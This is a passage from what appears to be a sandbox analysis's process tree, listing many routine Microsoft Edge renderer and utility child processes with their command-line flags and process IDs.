"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3528 /prefetch:8
14⤵
PID:17564

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5700 /prefetch:1
14⤵
PID:17780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6520 /prefetch:1
14⤵
PID:17916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6752 /prefetch:1
14⤵
PID:18100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.MediaFoundationService --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --service-sandbox-type=mf_cdm --mojo-platform-channel-handle=6880 /prefetch:8
14⤵
PID:18152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=6948 /prefetch:8
14⤵
- Modifies registry class
PID:18264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=media.mojom.CdmService --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --service-sandbox-type=cdm --mojo-platform-channel-handle=7028 /prefetch:8
14⤵
PID:18484

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6252 /prefetch:1
14⤵
PID:18520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6724 /prefetch:1
14⤵
PID:18720

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6896 /prefetch:1
14⤵
PID:18884

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3868 /prefetch:1
14⤵
PID:18900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1
14⤵
PID:18916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6088 /prefetch:1
14⤵
PID:18936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5132 /prefetch:1
14⤵
PID:18964

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3532 /prefetch:1
14⤵
PID:19020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5104 /prefetch:1
14⤵
PID:19064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6744 /prefetch:1
14⤵
PID:19156

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:1
14⤵
PID:19220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6804 /prefetch:1
14⤵
PID:19264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:1
14⤵
PID:19604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6864 /prefetch:1
14⤵
PID:19768

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:1
14⤵
PID:19784

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
14⤵
PID:19808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5640 /prefetch:1
14⤵
PID:20196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5184 /prefetch:1
14⤵
PID:20320

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1
14⤵
PID:21096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6984 /prefetch:1
14⤵
PID:21240

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5792 /prefetch:1
14⤵
PID:21432

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5376 /prefetch:1
14⤵
PID:21544

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7696 /prefetch:1
14⤵
PID:21608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5168 /prefetch:1
14⤵
PID:22004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6428 /prefetch:1
14⤵
PID:22196

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6244 /prefetch:1
14⤵
PID:22492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7880 /prefetch:1
14⤵
PID:22608

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6628 /prefetch:1
14⤵
PID:23464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6232 /prefetch:1
14⤵
PID:23604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6040 /prefetch:1
14⤵
PID:24368

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7596 /prefetch:1
14⤵
PID:24512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4508 /prefetch:1
14⤵
PID:25136

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=69 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3332 /prefetch:1
14⤵
PID:25268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=71 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7956 /prefetch:1
14⤵
PID:25888

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=72 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
14⤵
PID:26164

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=74 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5976 /prefetch:1
14⤵
PID:26900

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=75 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:1
14⤵
PID:27064

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=76 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7136 /prefetch:1
14⤵
PID:27144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=77 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1
14⤵
PID:27252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6868 /prefetch:8
14⤵
PID:27524

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=80 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6548 /prefetch:1
14⤵
PID:27920

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=81 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6524 /prefetch:1
14⤵
PID:28084

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=82 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7732 /prefetch:1
14⤵
PID:28096

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=85 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5584 /prefetch:1
14⤵
PID:6940

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=86 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5404 /prefetch:1
14⤵
PID:30832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=87 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7964 /prefetch:1
14⤵
PID:31008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=88 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7520 /prefetch:1
14⤵
PID:31108

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=89 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3908 /prefetch:1
14⤵
PID:31220

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=90 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4868 /prefetch:1
14⤵
PID:31844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=91 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5300 /prefetch:1
14⤵
PID:31924

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=92 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5972 /prefetch:1
14⤵
PID:32012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=93 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5536 /prefetch:1
14⤵
PID:32844

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=94 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6440 /prefetch:1
14⤵
PID:33004

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=96 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4616 /prefetch:1
14⤵
PID:33652

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=97 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3784 /prefetch:1
14⤵
PID:15012

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=98 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
14⤵
PID:33848

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=100 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5332 /prefetch:1
14⤵
PID:34656

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=101 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5636 /prefetch:1
14⤵
PID:34832

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=103 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6348 /prefetch:1
14⤵
PID:35512

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=104 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6320 /prefetch:1
14⤵
PID:35704

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=105 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4496 /prefetch:1
14⤵
PID:35796

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=106 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5896 /prefetch:1
14⤵
PID:35868

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
